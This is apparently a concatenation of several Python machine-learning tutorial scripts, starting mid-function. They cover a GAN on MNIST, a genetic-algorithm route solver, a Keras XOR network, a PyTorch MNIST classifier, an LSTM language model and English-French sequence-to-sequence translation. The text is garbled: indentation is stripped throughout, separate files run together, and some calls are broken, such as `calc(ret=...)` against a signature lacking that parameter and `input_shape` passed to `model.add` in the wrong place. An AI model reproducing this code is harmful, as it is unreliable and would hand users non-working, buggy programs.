noise = np.random.uniform(-1.0, 1.0, size=(samples, 100))
else:
filename = f"mnist_{step}.png"
images = self.generator.predict(noise)
else:
i = np.random.randint(0, self.X_train.shape[0], samples)
images = self.X_train[i]
if noise is None:
filename = "mnist_real.png"
plt.figure(figsize=(10, 10))
for i in range(images.shape[0]):
plt.subplot(4, 4, i+1)
image = images[i]
image = np.reshape(image, (self.img_x, self.img_y))
plt.imshow(image, cmap="gray")
plt.axis("off")
plt.tight_layout()
if save2file:
plt.savefig(filename)
plt.close("all")
else:
plt.show()
# https://stackoverflow.com/questions/4601373/better-way-to-shuffle-two-numpy-arrays-in-unison
def shuffle_in_unison(a, b):
rng_state = np.random.get_state()
np.random.shuffle(a)
np.random.set_state(rng_state)
np.random.shuffle(b)
if __name__ == "__main__":
mnist_gan = MNIST()
mnist_gan.train(train_steps=10000, batch_size=256, save_interval=500)
mnist_gan.plot_images(fake=True, save2file=True)
mnist_gan.plot_images(fake=False, save2file=True)
import random
import numpy as np
import pandas as pd
import operator
import matplotlib.pyplot as plt
from threading import Event, Thread
class Individual:
def __init__(self, object):
self.object = object
def update(self, new):
self.object = new
def __repr__(self):
return self.object
def __str__(self):
return self.object
class GeneticAlgorithm:
"""General purpose genetic algorithm implementation"""
def __init__(self, individual, popsize, elite_size, mutation_rate, generations, fitness_func, plot=True, prn=True, animation_func=None):
self.individual = individual
self.popsize = popsize
self.elite_size = elite_size
self.mutation_rate = mutation_rate
self.generations = generations
if not callable(fitness_func):
raise TypeError("fitness_func must be a callable object.")
self.get_fitness = fitness_func
self.plot = plot
self.prn = prn
self.population = self._init_pop()
self.animate = animation_func
def calc(self):
"""Try to find the best individual.
This function returns (initial_individual, final_individual, """
sorted_pop = self.sortpop()
initial_route = self.population[sorted_pop[0][0]]
distance = 1 / sorted_pop[0][1]
progress = [ distance ]
if callable(self.animate):
self.plot = True
individual = Individual(initial_route)
stop_animation = Event()
self.animate(individual, progress, stop_animation, plot_conclusion=initial_route)
else:
self.plot = False
if self.prn:
print(f"Initial distance: {distance}")
try:
if self.plot:
for i in range(self.generations):
population = self.next_gen()
sorted_pop = self.sortpop()
distance = 1 / sorted_pop[0][1]
progress.append(distance)
if self.prn:
print(f"[Generation:{i}] Current distance: {distance}")
route = population[sorted_pop[0][0]]
individual.update(route)
else:
for i in range(self.generations):
population = self.next_gen()
distance = 1 / self.sortpop()[0][1]
if self.prn:
print(f"[Generation:{i}] Current distance: {distance}")
except KeyboardInterrupt:
pass
try:
stop_animation.set()
except NameError:
pass
final_route_index = self.sortpop()[0][0]
final_route = population[final_route_index]
if self.prn:
print("Final route:", final_route)
return initial_route, final_route, distance
def create_population(self):
return random.sample(self.individual, len(self.individual))
def _init_pop(self):
return [ self.create_population() for i in range(self.popsize) ]
def sortpop(self):
"""This function calculates the fitness of each individual in population
And returns a population sorted by its fitness in descending order"""
result = [ (i, self.get_fitness(individual)) for i, individual in enumerate(self.population) ]
return sorted(result, key=operator.itemgetter(1), reverse=True)
def selection(self):
sorted_pop = self.sortpop()
df = pd.DataFrame(np.array(sorted_pop), columns=["Index", "Fitness"])
df['cum_sum'] = df['Fitness'].cumsum()
df['cum_perc'] = 100 * df['cum_sum'] / df['Fitness'].sum()
result = [ sorted_pop[i][0] for i in range(self.elite_size) ]
for i in range(len(sorted_pop) - self.elite_size):
pick = random.random() * 100
for i in range(len(sorted_pop)):
if pick <= df['cum_perc'][i]:
result.append(sorted_pop[i][0])
break
return [ self.population[index] for index in result ]
def breed(self, parent1, parent2):
child1, child2 = [], []
gene_A = random.randint(0, len(parent1))
gene_B = random.randint(0, len(parent2))
start_gene = min(gene_A, gene_B)
end_gene = max(gene_A, gene_B)
for i in range(start_gene, end_gene):
child1.append(parent1[i])
child2 = [ item for item in parent2 if item not in child1 ]
return child1 + child2
def breed_population(self, selection):
pool = random.sample(selection, len(selection))
children = [selection[i] for i in range(self.elite_size)]
children.extend([self.breed(pool[i], pool[len(selection)-i-1]) for i in range(len(selection) - self.elite_size)])
return children
def mutate(self, individual):
individual_length = len(individual)
for swapped in range(individual_length):
if(random.random() < self.mutation_rate):
swap_with = random.randint(0, individual_length-1)
individual[swapped], individual[swap_with] = individual[swap_with], individual[swapped]
return individual
def mutate_population(self, children):
return [ self.mutate(individual) for individual in children ]
def next_gen(self):
selection = self.selection()
children = self.breed_population(selection)
self.population = self.mutate_population(children)
return self.population
from genetic import plt
from genetic import Individual
from threading import Thread
def plot_routes(initial_route, final_route):
_, ax = plt.subplots(nrows=1, ncols=2)
for col, route in zip(ax, [("Initial Route", initial_route), ("Final Route", final_route) ]):
col.title.set_text(route[0])
route = route[1]
for i, city in enumerate(route):
if i == 0:
col.text(city.x-5, city.y+5, "Start")
col.scatter(city.x, city.y, s=70, c='g')
else:
col.scatter(city.x, city.y, s=70, c='b')
col.plot([ city.x for city in route ], [city.y for city in route], c='r')
col.plot([route[-1].x, route[0].x], [route[-1].y, route[0].y], c='r')
plt.show()
def animate_progress(route, progress, stop_animation, plot_conclusion=None):
def animate():
nonlocal route
_, ax1 = plt.subplots(nrows=1, ncols=2)
while True:
if isinstance(route, Individual):
target = route.object
ax1[0].clear()
ax1[1].clear()
# current routes and cities
ax1[0].title.set_text("Current routes")
for i, city in enumerate(target):
if i == 0:
ax1[0].text(city.x-5, city.y+5, "Start")
ax1[0].scatter(city.x, city.y, s=70, c='g')
else:
ax1[0].scatter(city.x, city.y, s=70, c='b')
ax1[0].plot([ city.x for city in target ], [city.y for city in target], c='r')
ax1[0].plot([target[-1].x, target[0].x], [target[-1].y, target[0].y], c='r')
# current distance graph
ax1[1].title.set_text("Current distance")
ax1[1].plot(progress)
ax1[1].set_ylabel("Distance")
ax1[1].set_xlabel("Generation")
plt.pause(0.05)
if stop_animation.is_set():
break
plt.show()
if plot_conclusion:
initial_route = plot_conclusion
plot_routes(initial_route, target)
Thread(target=animate).start()
import matplotlib.pyplot as plt
import random
import numpy as np
import operator
from plots import animate_progress, plot_routes
class City:
def __init__(self, x, y):
self.x = x
self.y = y
def distance(self, city):
"""Returns distance between self city and city"""
x = abs(self.x - city.x)
y = abs(self.y - city.y)
return np.sqrt(x ** 2 + y ** 2)
def __sub__(self, city):
return self.distance(city)
def __repr__(self):
return f"({self.x}, {self.y})"
def __str__(self):
return self.__repr__()
def get_fitness(route):
def get_distance():
distance = 0
for i in range(len(route)):
from_city = route[i]
to_city = route[i+1] if i+1 < len(route) else route[0]
distance += (from_city - to_city)
return distance
return 1 / get_distance()
def load_cities():
return [ City(city[0], city[1]) for city in [(169, 20), (103, 24), (41, 9), (177, 76), (138, 173), (163, 108), (93, 34), (200, 84), (19, 184), (117, 176), (153, 30), (140, 29), (38, 108), (89, 183), (18, 4), (174, 38), (109, 169), (93, 23), (156, 10), (171, 27), (164, 91), (109, 194), (90, 169), (115, 37), (177, 93), (169, 20)] ]
def generate_cities(size):
cities = []
for i in range(size):
x = random.randint(0, 200)
y = random.randint(0, 200)
if 40 < x < 160:
if 0.5 <= random.random():
y = random.randint(0, 40)
else:
y = random.randint(160, 200)
elif 40 < y < 160:
if 0.5 <= random.random():
x = random.randint(0, 40)
else:
x = random.randint(160, 200)
cities.append(City(x, y))
return cities
def benchmark(cities):
popsizes = [60, 80, 100, 120, 140]
elite_sizes = [5, 10, 20, 30, 40]
mutation_rates = [0.02, 0.01, 0.005, 0.003, 0.001]
generations = 1200
iterations = len(popsizes) * len(elite_sizes) * len(mutation_rates)
iteration = 0
gens = {}
for popsize in popsizes:
for elite_size in elite_sizes:
for mutation_rate in mutation_rates:
iteration += 1
gen = GeneticAlgorithm(cities, popsize=popsize, elite_size=elite_size, mutation_rate=mutation_rate, generations=generations, fitness_func=get_fitness, prn=False)
initial_route, final_route, generation = gen.calc(ret=("generation", 755))
if generation == generations:
print(f"[{iteration}/{iterations}] (popsize={popsize}, elite_size={elite_size}, mutation_rate={mutation_rate}): could not reach the solution")
else:
print(f"[{iteration}/{iterations}] (popsize={popsize}, elite_size={elite_size}, mutation_rate={mutation_rate}): {generation} generations was enough")
if generation != generations:
gens[iteration] = generation
# reversed_gen = {v:k for k, v in gens.items()}
output = sorted(gens.items(), key=operator.itemgetter(1))
for i, gens in output:
print(f"Iteration: {i} generations: {gens}")
# [1] (popsize=60, elite_size=30, mutation_rate=0.001): 235 generations was enough
# [2] (popsize=80, elite_size=20, mutation_rate=0.001): 206 generations was enough
# [3] (popsize=100, elite_size=30, mutation_rate=0.001): 138 generations was enough
# [4] (popsize=120, elite_size=30, mutation_rate=0.002): 117 generations was enough
# [5] (popsize=140, elite_size=20, mutation_rate=0.003): 134 generations was enough
# The notes:
# 1.1 Increasing the mutation rate to higher rate, the curve will be inconsistent and it won't lead us to the optimal distance.
# 1.2 So we need to put it as small as 1% or lower
# 2. Elite size is likely to be about 30% or less of total population
# 3. Generations depends on the other parameters, can be a fixed number, or until we reach the optimal distance.
# 4.
if __name__ == "__main__":
from genetic import GeneticAlgorithm
cities = load_cities()
# cities = generate_cities(50)
# parameters
popsize = 120
elite_size = 30
mutation_rate = 0.1
generations = 400
gen = GeneticAlgorithm(cities, popsize=popsize, elite_size=elite_size, mutation_rate=mutation_rate, generations=generations, fitness_func=get_fitness, animation_func=animate_progress)
initial_route, final_route, distance = gen.calc()
import tensorflow as tf
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
import re
import numpy as np
import os
import time
import json
from glob import glob
from PIL import Image
import pickle
import numpy as np
from keras.utils import np_utils
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Activation
np.random.seed(19)
X = np.array([[0,0],[0,1],[1,0],[1,1]]).astype('float32')
y = np.array([[0],[1],[1],[0]]).astype('float32')
y = np_utils.to_categorical(y)
xor = Sequential()
# add required layers
xor.add(Dense(8, input_dim=2))
# hyperbolic tangent function to the first hidden layer ( 8 nodes )
xor.add(Activation("tanh"))
xor.add(Dense(8))
xor.add(Activation("relu"))
# output layer
xor.add(Dense(2))
# sigmoid function to the output layer ( final )
xor.add(Activation("sigmoid"))
# Cross-entropy error function
xor.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
# show the summary of the model
xor.summary()
xor.fit(X, y, epochs=400, verbose=1)
# accuray
score = xor.evaluate(X, y)
print(f"Accuracy: {score[-1]}")
# Checking the predictions
print("\nPredictions:")
print(xor.predict(X))
import torch
import torchvision
from torchvision import transforms, datasets
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import matplotlib.pyplot as plt
epochs = 3
batch_size = 64
# building the network now
class Net(nn.Module):
def __init__(self):
super().__init__()
# takes 28x28 images
self.fc1 = nn.Linear(28*28, 64)
self.fc2 = nn.Linear(64, 64)
self.fc3 = nn.Linear(64, 64)
self.fc4 = nn.Linear(64, 10)
def forward(self, x):
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = self.fc4(x)
return F.log_softmax(x, dim=1)
if __name__ == "__main__":
training_set = datasets.MNIST("", train=True, download=True,
transform=transforms.Compose([
transforms.ToTensor()
]))
test_set = datasets.MNIST("", train=False, download=True,
transform=transforms.Compose([
transforms.ToTensor()
]))
# load the dataset
train = torch.utils.data.DataLoader(training_set, batch_size=batch_size, shuffle=True)
test = torch.utils.data.DataLoader(test_set, batch_size=batch_size, shuffle=False)
# construct the model
net = Net()
# specify the loss and optimizer
loss = nn.CrossEntropyLoss()
optimizer = optim.Adam(net.parameters(), lr=0.001)
# training the model
for epoch in range(epochs):
for data in train:
# data is the batch of data now
# X are the features, y are labels
X, y = data
net.zero_grad() # set gradients to 0 before loss calculation
output = net(X.view(-1, 28*28)) # feed data to the network
loss = F.nll_loss(output, y) # calculating the negative log likelihood
loss.backward() # back propagation
optimizer.step() # attempt to optimize weights to account for loss/gradients
print(loss)
correct = 0
total = 0
with torch.no_grad():
for data in test:
X, y = data
output = net(X.view(-1, 28*28))
for index, i in enumerate(output):
if torch.argmax(i) == y[index]:
correct += 1
total += 1
print("Accuracy:", round(correct / total, 3))
# testing
print(torch.argmax(net(X.view(-1, 28*28))[0]))
plt.imshow(X[0].view(28, 28))
plt.show()
from keras.models import Sequential
from keras.layers import LSTM, Dropout, BatchNormalization, LeakyReLU, Dense, Activation, TimeDistributed
from keras.layers import Bidirectional
def rnn_model(input_dim, cell, num_layers, units, dropout, batch_normalization=True, bidirectional=True):
model = Sequential()
for i in range(num_layers):
if i == 0:
# first time, specify input_shape
if bidirectional:
model.add(Bidirectional(cell(units, input_shape=(None, input_dim), return_sequences=True)))
else:
model.add(cell(units, input_shape=(None, input_dim), return_sequences=True))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
else:
if bidirectional:
model.add(Bidirectional(cell(units, return_sequences=True)))
else:
model.add(cell(units, return_sequences=True))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
model.add(TimeDistributed(Dense(input_dim, activation="softmax")))
return model
from utils import UNK, text_to_sequence, sequence_to_text
from keras.preprocessing.sequence import pad_sequences
from keras.layers import LSTM
from models import rnn_model
from scipy.ndimage.interpolation import shift
import numpy as np
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=6,
inter_op_parallelism_threads=6,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
INPUT_DIM = 50
test_text = ""
test_text += """college or good clerk at university has not pleasant days or used not to have them half a century ago but his position was recognized and the misery was measured can we just make something that is useful for making this happen especially when they are just doing it by"""
encoded = np.expand_dims(np.array(text_to_sequence(test_text)), axis=0)
encoded = encoded.reshape((-1, encoded.shape[0], encoded.shape[1]))
model = rnn_model(INPUT_DIM, LSTM, 4, 380, 0.3, bidirectional=False)
model.load_weights("results/lm_rnn_v2_6400548.3.h5")
# for i in range(10):
# predicted_word_int = model.predict_classes(encoded)[0]
# print(predicted_word_int, end=',')
# word = sequence_to_text(predicted_word_int)
# encoded = shift(encoded, -1, cval=predicted_word_int)
# print(word, end=' ')
print("Fed:")
print(encoded)
print("Result: predict")
print(model.predict(encoded)[0])
print("Result: predict_proba")
print(model.predict_proba(encoded)[0])
print("Result: predict_classes")
print(model.predict_classes(encoded)[0])
print(sequence_to_text(model.predict_classes(encoded)[0]))
print()
from models import rnn_model
from utils import sequence_to_text, text_to_sequence, get_batches, get_data, get_text, vocab
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
import numpy as np
import os
INPUT_DIM = 50
# OUTPUT_DIM = len(vocab)
BATCH_SIZE = 128
# get data
text = get_text("data")
encoded = np.array(text_to_sequence(text))
print(len(encoded))
# X, y = get_data(encoded, INPUT_DIM, 1)
# del text, encoded
model = rnn_model(INPUT_DIM, LSTM, 4, 380, 0.3, bidirectional=False)
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
model.summary()
if not os.path.isdir("results"):
os.mkdir("results")
checkpointer = ModelCheckpoint("results/lm_rnn_v2_{loss:.1f}.h5", verbose=1)
steps_per_epoch = (len(encoded) // 100) // BATCH_SIZE
model.fit_generator(get_batches(encoded, BATCH_SIZE, INPUT_DIM),
epochs=100,
callbacks=[checkpointer],
verbose=1,
steps_per_epoch=steps_per_epoch)
model.save("results/lm_rnn_v2_final.h5")
import numpy as np
import os
import tqdm
import inflect
from string import punctuation, whitespace
from word_forms.word_forms import get_word_forms
p = inflect.engine()
UNK = "<unk>"
vocab = set()
add = vocab.add
# add unk
add(UNK)
with open("data/vocab1.txt") as f:
for line in f:
add(line.strip())
vocab = sorted(vocab)
word2int = {w: i for i, w in enumerate(vocab)}
int2word = {i: w for i, w in enumerate(vocab)}
def update_vocab(word):
global vocab
global word2int
global int2word
vocab.add(word)
next_int = max(int2word) + 1
word2int[word] = next_int
int2word[next_int] = word
def save_vocab(_vocab):
with open("vocab1.txt", "w") as f:
for w in sorted(_vocab):
print(w, file=f)
def text_to_sequence(text):
return [ word2int[word] for word in text.split() ]
def sequence_to_text(seq):
return ' '.join([ int2word[i] for i in seq ])
def get_batches(arr, batch_size, n_steps):
'''Create a generator that returns batches of size
batch_size x n_steps from arr.
Arguments
---------
arr: Array you want to make batches from
batch_size: Batch size, the number of sequences per batch
n_steps: Number of sequence steps per batch
'''
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
while True:
for n in range(0, arr.shape[1], n_steps):
x = arr[:, n: n+n_steps]
y_temp = arr[:, n+1:n+n_steps+1]
y = np.zeros(x.shape, dtype=y_temp.dtype)
y[:, :y_temp.shape[1]] = y_temp
yield x.reshape(1, x.shape[0], x.shape[1]), y.reshape(1, y.shape[0], y.shape[1])
def get_data(arr, n_seq, look_forward):
n_samples = len(arr) // n_seq
X = np.zeros((n_seq, n_samples))
Y = np.zeros((n_seq, n_samples))
for index, i in enumerate(range(0, n_samples*n_seq, n_seq)):
x = arr[i:i+n_seq]
y = arr[i+look_forward:i+n_seq+look_forward]
if len(x) != n_seq or len(y) != n_seq:
break
X[:, index] = x
Y[:, index] = y
return X.T.reshape(1, X.shape[1], X.shape[0]), Y.T.reshape(1, Y.shape[1], Y.shape[0])
def get_text(path, files=["carroll-alice.txt", "text.txt", "text8.txt"]):
global vocab
global word2int
global int2word
text = ""
file = files[0]
for file in tqdm.tqdm(files, "Loading data"):
file = os.path.join(path, file)
with open(file, encoding="utf8") as f:
text += f.read().lower()
punc = set(punctuation)
text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c not in punc ])
for ws in whitespace:
text = text.replace(ws, " ")
text = text.split()
co = 0
vocab_set = set(vocab)
for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
# convert digits to words
# (i.e '7' to 'seven')
if text[i].isdigit():
text[i] = p.number_to_words(text[i])
# compare_nouns
# compare_adjs
# compare_verbs
if text[i] not in vocab_set:
text[i] = UNK
co += 1
# update vocab, intersection of words
print("vocab length:", len(vocab))
vocab = vocab_set & set(text)
print("vocab length after update:", len(vocab))
save_vocab(vocab)
print("Number of unks:", co)
return ' '.join(text)
from train import create_model, get_data, split_data, LSTM_UNITS, np, to_categorical, Tokenizer, pad_sequences, pickle
def tokenize(x, tokenizer=None):
"""Tokenize x
:param x: List of sentences/strings to be tokenized
:return: Tuple of (tokenized x data, tokenizer used to tokenize x)"""
if tokenizer:
t = tokenizer
else:
t = Tokenizer()
t.fit_on_texts(x)
return t.texts_to_sequences(x), t
def predict_sequence(enc, dec, source, n_steps, docoder_num_tokens):
"""Generate target given source sequence, this function can be used
after the model is trained to generate a target sequence given a source sequence."""
# encode
state = enc.predict(source)
# start of sequence input
target_seq = np.zeros((1, 1, n_steps))
# collect predictions
output = []
for t in range(n_steps):
# predict next char
yhat, h, c = dec.predict([target_seq] + state)
# store predictions
y = yhat[0, 0, :]
sampled_token_index = np.argmax(y)
output.append(sampled_token_index)
# update state
state = [h, c]
# update target sequence
target_seq = np.zeros((1, 1, n_steps))
target_seq[0, 0] = to_categorical(sampled_token_index, num_classes=n_steps)
return np.array(output)
def logits_to_text(logits, index_to_words):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
return ' '.join([index_to_words[prediction] for prediction in logits])
# load the data
X, y, X_tk, y_tk, source_sequence_length, target_sequence_length = get_data("fra.txt")
X_tk = pickle.load(open("X_tk.pickle", "rb"))
y_tk = pickle.load(open("y_tk.pickle", "rb"))
model, enc, dec = create_model(source_sequence_length, target_sequence_length, LSTM_UNITS)
model.load_weights("results/eng_fra_v1_17568.086.h5")
while True:
text = input("> ")
tokenized = np.array(tokenize([text], tokenizer=X_tk)[0])
print(tokenized.shape)
X = pad_sequences(tokenized, maxlen=source_sequence_length, padding="post")
X = X.reshape((1, 1, X.shape[-1]))
print(X.shape)
# X = to_categorical(X, num_classes=len(X_tk.word_index) + 1)
print(X.shape)
sequence = predict_sequence(enc, dec, X, target_sequence_length, source_sequence_length)
result = logits_to_text(sequence, y_tk.index_word)
print(result)
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input, LSTM, GRU, Dense, Embedding, Activation, Dropout, Sequential, RepeatVector
from tensorflow.keras.layers import TimeDistributed
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.utils import to_categorical, plot_model
from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard
import numpy as np
import matplotlib.pyplot as plt
import os
import pickle
# hyper parameters
BATCH_SIZE = 32
EPOCHS = 10
LSTM_UNITS = 128
def create_encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size):
model = Sequential()
model.add(LSTM(LSTM_UNITS), input_shape=input_shape[1:])
model.add(RepeatVector(output_sequence_length))
model.add(LSTM(LSTM_UNITS), return_sequences=True)
model.add(TimeDistributed(Dense(french_vocab_size, activation="softmax")))
model.compile(loss="sparse_categorical_crossentropy", optimizer="adam", metrics=["categorical_accuracy"])
return model
def create_model(num_encoder_tokens, num_decoder_tokens, latent_dim):
# define an input sequence
encoder_inputs = Input(shape=(None, num_encoder_tokens))
encoder = LSTM(latent_dim, return_state=True)
# define the encoder output
encoder_outputs, state_h, state_c = encoder(encoder_inputs)
encoder_states = [state_h, state_c]
# encoder inference model
encoder_model = Model(encoder_inputs, encoder_states)
# set up the decoder now
decoder_inputs = Input(shape=(None, num_decoder_tokens))
decoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)
decoder_outputs, _, _ = decoder_lstm(decoder_inputs, initial_state=encoder_states)
decoder_dense = Dense(num_decoder_tokens, activation="softmax")
decoder_outputs = decoder_dense(decoder_outputs)
# decoder inference model
decoder_state_input_h = Input(shape=(latent_dim,))
decoder_state_input_c = Input(shape=(latent_dim,))
decoder_state_inputs = [decoder_state_input_h, decoder_state_input_c]
model = Model([encoder_inputs, decoder_inputs], decoder_outputs)
decoder_outputs, state_h, state_c = decoder_lstm(decoder_inputs, initial_state=decoder_state_inputs)
decoder_states = [state_h, state_c]
decoder_model = Model([decoder_inputs] + decoder_state_inputs, [decoder_outputs] + decoder_states)
return model, encoder_model, decoder_model
def get_batches(X, y, X_tk, y_tk, source_sequence_length, target_sequence_length, batch_size=BATCH_SIZE):
# get total number of words in X
num_encoder_tokens = len(X_tk.word_index) + 1
# get max number of words in all sentences in y
num_decoder_tokens = len(y_tk.word_index) + 1
while True:
for j in range(0, len(X), batch_size):
encoder_input_data = X[j: j+batch_size]
decoder_input_data = y[j: j+batch_size]
# redefine batch size
# it may differ (in last batch of dataset)
batch_size = encoder_input_data.shape[0]
# one-hot everything
# decoder_target_data = np.zeros((batch_size, num_decoder_tokens, target_sequence_length), dtype=np.uint8)
# encoder_data = np.zeros((batch_size, source_sequence_length, num_encoder_tokens), dtype=np.uint8)
# decoder_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens), dtype=np.uint8)
encoder_data = np.expand_dims(encoder_input_data, axis=1)
decoder_data = np.expand_dims(decoder_input_data, axis=1)
# for i, sequence in enumerate(decoder_input_data):
# for t, word_index in enumerate(sequence):
# # skip the first
# if t > 0:
# decoder_target_data[i, t-1, word_index] = 1
# decoder_data[i, t, word_index] = 1
# for i, sequence in enumerate(encoder_input_data):
# for t, word_index in enumerate(sequence):
# encoder_data[i, t, word_index] = 1
yield ([encoder_data, decoder_data], decoder_input_data)
def get_data(file):
X = []
y = []
# loading the data
for line in open(file, encoding="utf-8"):
if "\t" not in line:
continue
# split by tab
line = line.strip().split("\t")
input = line[0]
output = line[1]
output = f"{output} <eos>"
output_sentence_input = f"<sos> {output}"
X.append(input)
y.append(output)
# tokenize data
X_tk = Tokenizer()
X_tk.fit_on_texts(X)
X = X_tk.texts_to_sequences(X)
y_tk = Tokenizer()
y_tk.fit_on_texts(y)
y = y_tk.texts_to_sequences(y)
# define the max sequence length for X
source_sequence_length = max(len(x) for x in X)
# define the max sequence length for y
target_sequence_length = max(len(y_) for y_ in y)
# padding sequences
X = pad_sequences(X, maxlen=source_sequence_length, padding="post")
y = pad_sequences(y, maxlen=target_sequence_length, padding="post")
return X, y, X_tk, y_tk, source_sequence_length, target_sequence_length
def shuffle_data(X, y):
"""
Shuffles X & y and preserving their pair order
"""
state = np.random.get_state()
np.random.shuffle(X)
np.random.set_state(state)
np.random.shuffle(y)
return X, y
def split_data(X, y, train_split_rate=0.2):
# shuffle first
X, y = shuffle_data(X, y)
training_samples = round(len(X) * train_split_rate)
return X[:training_samples], y[:training_samples], X[training_samples:], y[training_samples:]
if __name__ == "__main__":
# load the data
X, y, X_tk, y_tk, source_sequence_length, target_sequence_length = get_data("fra.txt")
# save tokenizers
pickle.dump(X_tk, open("X_tk.pickle", "wb"))
pickle.dump(y_tk, open("y_tk.pickle", "wb"))
# shuffle & split data
X_train, y_train, X_test, y_test = split_data(X, y)
# construct the models
model, enc, dec = create_model(source_sequence_length, target_sequence_length, LSTM_UNITS)
plot_model(model, to_file="model.png")
plot_model(enc, to_file="enc.png")
plot_model(dec, to_file="dec.png")
model.summary()
model.compile(optimizer="adam", loss="categorical_crossentropy", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpointer = ModelCheckpoint("results/eng_fra_v1_{val_loss:.3f}.h5", save_best_only=True, verbose=2)
# train the model
model.fit_generator(get_batches(X_train, y_train, X_tk, y_tk, source_sequence_length, target_sequence_length),
validation_data=get_batches(X_test, y_test, X_tk, y_tk, source_sequence_length, target_sequence_length),
epochs=EPOCHS, steps_per_epoch=(len(X_train) // BATCH_SIZE),
validation_steps=(len(X_test) // BATCH_SIZE),
callbacks=[checkpointer])
print("[+] Model trained.")
model.save("results/eng_fra_v1.h5")
print("[+] Model saved.")
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.models import Model, Sequential
from tensorflow.keras.layers import GRU, Input, Dense, TimeDistributed, Activation, RepeatVector, Bidirectional, Flatten
from tensorflow.keras.layers import Dropout, LSTM
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.losses import sparse_categorical_crossentropy
import collections
import numpy as np
LSTM_UNITS = 128
def get_data(file):
X = []
y = []
# loading the data
for line in open(file, encoding="utf-8"):
if "\t" not in line:
continue
# split by tab
line = line.strip().split("\t")
input = line[0]
output = line[1]
X.append(input)
y.append(output)
return X, y
def create_encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size):
model = Sequential()
model.add(LSTM(LSTM_UNITS, input_shape=input_shape[1:]))
model.add(RepeatVector(output_sequence_length))
model.add(LSTM(LSTM_UNITS, return_sequences=True))
model.add(TimeDistributed(Dense(french_vocab_size, activation="softmax")))
model.compile(loss="sparse_categorical_crossentropy", optimizer="adam", metrics=["categorical_accuracy"])
return model
def tokenize(x):
"""
Tokenize x
:param x: List of sentences/strings to be tokenized
:return: Tuple of (tokenized x data, tokenizer used to tokenize x)
"""
# TODO: Implement
t = Tokenizer()
t.fit_on_texts(x)
return t.texts_to_sequences(x), t
def pad(x, length=None):
"""
Pad x
:param x: List of sequences.
:param length: Length to pad the sequence to. If None, use length of longest sequence in x.
:return: Padded numpy array of sequences
"""
# TODO: Implement
sequences = pad_sequences(x, maxlen=length, padding='post')
return sequences
def preprocess(x, y):
"""
Preprocess x and y
:param x: Feature List of sentences
:param y: Label List of sentences
:return: Tuple of (Preprocessed x, Preprocessed y, x tokenizer, y tokenizer)
"""
preprocess_x, x_tk = tokenize(x)
preprocess_y, y_tk = tokenize(y)
preprocess_x = pad(preprocess_x)
preprocess_y = pad(preprocess_y)
# Keras's sparse_categorical_crossentropy function requires the labels to be in 3 dimensions
preprocess_y = preprocess_y.reshape(*preprocess_y.shape, 1)
return preprocess_x, preprocess_y, x_tk, y_tk
def logits_to_text(logits, tokenizer):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
index_to_words = {id: word for word, id in tokenizer.word_index.items()}
index_to_words[0] = '<PAD>'
return ' '.join([index_to_words[prediction] for prediction in np.argmax(logits, 1)])
if __name__ == "__main__":
X, y = get_data("ara.txt")
english_words = [word for sentence in X for word in sentence.split()]
french_words = [word for sentence in y for word in sentence.split()]
english_words_counter = collections.Counter(english_words)
french_words_counter = collections.Counter(french_words)
print('{} English words.'.format(len(english_words)))
print('{} unique English words.'.format(len(english_words_counter)))
print('10 Most common words in the English dataset:')
print('"' + '" "'.join(list(zip(*english_words_counter.most_common(10)))[0]) + '"')
print()
print('{} French words.'.format(len(french_words)))
print('{} unique French words.'.format(len(french_words_counter)))
print('10 Most common words in the French dataset:')
print('"' + '" "'.join(list(zip(*french_words_counter.most_common(10)))[0]) + '"')
# Tokenize Example output
text_sentences = [
'The quick brown fox jumps over the lazy dog .',
'By Jove , my quick study of lexicography won a prize .',
'This is a short sentence .']
text_tokenized, text_tokenizer = tokenize(text_sentences)
print(text_tokenizer.word_index)
print()
for sample_i, (sent, token_sent) in enumerate(zip(text_sentences, text_tokenized)):
print('Sequence {} in x'.format(sample_i + 1))
print(' Input: {}'.format(sent))
print(' Output: {}'.format(token_sent))
# Pad Tokenized output
test_pad = pad(text_tokenized)
for sample_i, (token_sent, pad_sent) in enumerate(zip(text_tokenized, test_pad)):
print('Sequence {} in x'.format(sample_i + 1))
print(' Input: {}'.format(np.array(token_sent)))
print(' Output: {}'.format(pad_sent))
